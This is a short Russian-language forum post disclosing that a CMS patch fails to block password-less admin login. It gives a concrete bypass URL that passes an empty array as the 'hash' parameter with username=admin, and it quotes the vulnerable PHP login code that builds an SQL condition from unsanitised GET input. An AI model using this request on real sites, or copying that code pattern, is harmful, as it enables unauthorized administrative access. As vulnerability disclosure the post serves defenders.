Показать сообщение отдельно
Старый 29.11.2012, 08:12   #12
Agel_Nash
 
Аватар для Agel_Nash
 
Регистрация: 24.07.2012
Сообщений: 30
Репутация: 18
По умолчанию

В продолжении предыдущей уязвимости. Патч выпущеный разработчиками не защищает должным образом от проникновения в админку без пароля. Обойти можно вот так
Цитата:
manager/processors/login.processor.php?hash[]=&username=admin
Проблемный участок кода
PHP код:
$hash = (empty($_GET['hash']) ? false $_GET['hash']);
......
if(!empty(
$hash)) { $wheres[] = "MD5(CONCAT(usr.username,usr.password,'{$site_id}','{$today}')) = '{$hash}'"; } 
__________________
Я - вильгельм заколебатель
Agel_Nash вне форума   Ответить с цитированием